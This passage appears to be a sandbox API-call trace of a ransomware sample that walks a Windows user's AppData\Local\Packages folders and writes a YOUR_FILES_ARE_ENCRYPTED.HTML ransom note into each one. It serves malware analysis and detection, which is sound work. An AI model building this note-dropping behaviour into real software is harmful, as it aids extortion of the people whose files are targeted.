[0116.760] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0116.760] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Runtime.1.0_8wekyb3d8bbwe\\Settings\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.net.native.runtime.1.0_8wekyb3d8bbwe\\settings\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x214 [0116.761] WriteFile (in: hFile=0x214, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0116.761] CloseHandle (hObject=0x214) returned 1 [0116.761] GetProcessHeap () returned 0x600000 [0116.761] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0116.761] GetProcessHeap () returned 0x600000 [0116.762] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314b010 | out: hHeap=0x600000) returned 1 [0116.762] FindNextFileW (in: hFindFile=0x6268b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf7624aaf, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xf7624aaf, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xf7624aaf, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="SystemAppData", cAlternateFileName="SYSTEM~1")) returned 1 [0116.762] StrStrIW (lpFirst="SystemAppData", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0116.762] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Runtime.1.0_8wekyb3d8bbwe\\SystemAppData") returned 109 [0116.762] GetProcessHeap () returned 0x600000 [0116.762] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x314b010 [0116.762] lstrcpyW (in: lpString1=0x314b010, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Runtime.1.0_8wekyb3d8bbwe\\SystemAppData" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Runtime.1.0_8wekyb3d8bbwe\\SystemAppData") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Runtime.1.0_8wekyb3d8bbwe\\SystemAppData" [0116.762] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Runtime.1.0_8wekyb3d8bbwe\\SystemAppData", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Runtime.1.0_8wekyb3d8bbwe\\SystemAppData\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Runtime.1.0_8wekyb3d8bbwe\\SystemAppData\\*" [0116.762] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Runtime.1.0_8wekyb3d8bbwe\\SystemAppData\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf7624aaf, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xf7624aaf, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xf7624aaf, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3185250, dwReserved1=0x3185190, cFileName=".", cAlternateFileName="")) returned 0x626838 [0116.762] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf7624aaf, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xf7624aaf, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xf7624aaf, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3185250, dwReserved1=0x3185190, cFileName="..", cAlternateFileName="")) returned 1 [0116.762] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf7624aaf, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xf7624aaf, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xf7624aaf, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3185250, dwReserved1=0x3185190, cFileName="..", cAlternateFileName="")) returned 0 [0116.762] FindClose (in: hFindFile=0x626838 | out: hFindFile=0x626838) returned 1 [0116.762] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Runtime.1.0_8wekyb3d8bbwe\\SystemAppData\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 139 [0116.762] GetProcessHeap () returned 0x600000 [0116.762] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0116.762] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Runtime.1.0_8wekyb3d8bbwe\\SystemAppData\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.net.native.runtime.1.0_8wekyb3d8bbwe\\systemappdata\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x214 [0116.763] WriteFile (in: hFile=0x214, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0116.763] CloseHandle (hObject=0x214) returned 1 [0116.764] GetProcessHeap () returned 0x600000 [0116.764] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0116.764] GetProcessHeap () returned 0x600000 [0116.764] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314b010 | out: hHeap=0x600000) returned 1 [0116.764] FindNextFileW (in: hFindFile=0x6268b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf75ff84b, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xf75ff84b, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xf75ff84b, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="TempState", cAlternateFileName="TEMPST~1")) returned 1 [0116.764] StrStrIW (lpFirst="TempState", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0116.764] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Runtime.1.0_8wekyb3d8bbwe\\TempState") returned 105 [0116.764] GetProcessHeap () returned 0x600000 [0116.764] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x314b010 [0116.764] lstrcpyW (in: lpString1=0x314b010, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Runtime.1.0_8wekyb3d8bbwe\\TempState" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Runtime.1.0_8wekyb3d8bbwe\\TempState") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Runtime.1.0_8wekyb3d8bbwe\\TempState" [0116.764] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Runtime.1.0_8wekyb3d8bbwe\\TempState", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Runtime.1.0_8wekyb3d8bbwe\\TempState\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Runtime.1.0_8wekyb3d8bbwe\\TempState\\*" [0116.764] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Runtime.1.0_8wekyb3d8bbwe\\TempState\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf75ff84b, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xf75ff84b, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xf75ff84b, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3185250, dwReserved1=0x3185190, cFileName=".", cAlternateFileName="")) returned 0x6266f8 [0116.764] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf75ff84b, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xf75ff84b, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xf75ff84b, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3185250, dwReserved1=0x3185190, cFileName="..", cAlternateFileName="")) returned 1 [0116.764] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf75ff84b, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xf75ff84b, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xf75ff84b, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3185250, dwReserved1=0x3185190, cFileName="..", cAlternateFileName="")) returned 0 [0116.764] FindClose (in: hFindFile=0x6266f8 | out: hFindFile=0x6266f8) returned 1 [0116.764] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Runtime.1.0_8wekyb3d8bbwe\\TempState\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 135 [0116.764] GetProcessHeap () returned 0x600000 [0116.764] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0116.764] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Runtime.1.0_8wekyb3d8bbwe\\TempState\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.net.native.runtime.1.0_8wekyb3d8bbwe\\tempstate\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x214 [0116.765] WriteFile (in: hFile=0x214, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0116.766] CloseHandle (hObject=0x214) returned 1 [0116.766] GetProcessHeap () returned 0x600000 [0116.766] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0116.766] GetProcessHeap () returned 0x600000 [0116.766] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314b010 | out: hHeap=0x600000) returned 1 [0116.766] FindNextFileW (in: hFindFile=0x6268b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf75ff84b, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xf75ff84b, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xf75ff84b, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="TempState", cAlternateFileName="TEMPST~1")) returned 0 [0116.766] FindClose (in: hFindFile=0x6268b8 | out: hFindFile=0x6268b8) returned 1 [0116.766] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Runtime.1.0_8wekyb3d8bbwe\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 125 [0116.766] GetProcessHeap () returned 0x600000 [0116.766] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0116.766] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Runtime.1.0_8wekyb3d8bbwe\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.net.native.runtime.1.0_8wekyb3d8bbwe\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x31c [0116.766] WriteFile (in: hFile=0x31c, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e7a4, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e7a4*=0x3c00, lpOverlapped=0x0) returned 1 [0116.767] CloseHandle (hObject=0x31c) returned 1 [0116.767] GetProcessHeap () returned 0x600000 [0116.767] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0116.767] GetProcessHeap () returned 0x600000 [0116.767] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x313b008 | out: hHeap=0x600000) returned 1 [0116.768] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x59d3082, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x5a457e3, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x5a457e3, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e94c, dwReserved1=0x39f712c, cFileName="Microsoft.NET.Native.Runtime.1.1_8wekyb3d8bbwe", cAlternateFileName="MICROS~1.1_8")) returned 1 [0116.768] StrStrIW (lpFirst="Microsoft.NET.Native.Runtime.1.1_8wekyb3d8bbwe", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0116.768] wnsprintfW (in: pszDest=0x6c47b8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Runtime.1.1_8wekyb3d8bbwe") returned 95 [0116.768] GetProcessHeap () returned 0x600000 [0116.768] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x313b008 [0116.769] lstrcpyW (in: lpString1=0x313b008, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Runtime.1.1_8wekyb3d8bbwe" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Runtime.1.1_8wekyb3d8bbwe") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Runtime.1.1_8wekyb3d8bbwe" [0116.769] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Runtime.1.1_8wekyb3d8bbwe", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Runtime.1.1_8wekyb3d8bbwe\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Runtime.1.1_8wekyb3d8bbwe\\*" [0116.769] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Runtime.1.1_8wekyb3d8bbwe\\*", lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x59d3082, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x5a457e3, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x5a457e3, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName=".", cAlternateFileName="")) returned 0x6266f8 [0116.778] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x59d3082, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x5a457e3, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x5a457e3, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="..", cAlternateFileName="")) returned 1 [0116.778] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x5a457e3, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x5a457e3, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x5a457e3, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="AC", cAlternateFileName="")) returned 1 [0116.778] StrStrIW (lpFirst="AC", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0116.778] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Runtime.1.1_8wekyb3d8bbwe\\AC") returned 98 [0116.778] GetProcessHeap () returned 0x600000 [0116.778] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x314b010 [0116.778] lstrcpyW (in: lpString1=0x314b010, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Runtime.1.1_8wekyb3d8bbwe\\AC" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Runtime.1.1_8wekyb3d8bbwe\\AC") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Runtime.1.1_8wekyb3d8bbwe\\AC" [0116.778] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Runtime.1.1_8wekyb3d8bbwe\\AC", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Runtime.1.1_8wekyb3d8bbwe\\AC\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Runtime.1.1_8wekyb3d8bbwe\\AC\\*" [0116.778] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Runtime.1.1_8wekyb3d8bbwe\\AC\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x5a457e3, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x5a457e3, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x5a457e3, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3184f10, dwReserved1=0x3184e50, cFileName=".", cAlternateFileName="")) returned 0x626838 [0116.780] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x5a457e3, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x5a457e3, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x5a457e3, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3184f10, dwReserved1=0x3184e50, cFileName="..", cAlternateFileName="")) returned 1 [0116.780] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x5a457e3, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x5a457e3, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x5a457e3, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3184f10, dwReserved1=0x3184e50, cFileName="INetCache", cAlternateFileName="INETCA~1")) returned 1 [0116.780] StrStrIW (lpFirst="INetCache", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0116.780] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Runtime.1.1_8wekyb3d8bbwe\\AC\\INetCache") returned 108 [0116.780] GetProcessHeap () returned 0x600000 [0116.780] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30f2fc0 [0116.781] lstrcpyW (in: lpString1=0x30f2fc0, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Runtime.1.1_8wekyb3d8bbwe\\AC\\INetCache" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Runtime.1.1_8wekyb3d8bbwe\\AC\\INetCache") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Runtime.1.1_8wekyb3d8bbwe\\AC\\INetCache" [0116.781] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Runtime.1.1_8wekyb3d8bbwe\\AC\\INetCache", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Runtime.1.1_8wekyb3d8bbwe\\AC\\INetCache\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Runtime.1.1_8wekyb3d8bbwe\\AC\\INetCache\\*" [0116.781] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Runtime.1.1_8wekyb3d8bbwe\\AC\\INetCache\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x5a457e3, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x5a457e3, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x5a457e3, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d090, dwReserved1=0x3184e58, cFileName=".", cAlternateFileName="")) returned 0x6265b8 [0116.782] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x5a457e3, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x5a457e3, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x5a457e3, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d090, dwReserved1=0x3184e58, cFileName="..", cAlternateFileName="")) returned 1 [0116.782] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x5a457e3, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x5a457e3, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x5a457e3, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d090, dwReserved1=0x3184e58, cFileName="..", cAlternateFileName="")) returned 0 [0116.782] FindClose (in: hFindFile=0x6265b8 | out: hFindFile=0x6265b8) returned 1 [0116.782] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Runtime.1.1_8wekyb3d8bbwe\\AC\\INetCache\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 138 [0116.782] GetProcessHeap () returned 0x600000 [0116.782] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0116.782] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Runtime.1.1_8wekyb3d8bbwe\\AC\\INetCache\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.net.native.runtime.1.1_8wekyb3d8bbwe\\ac\\inetcache\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, 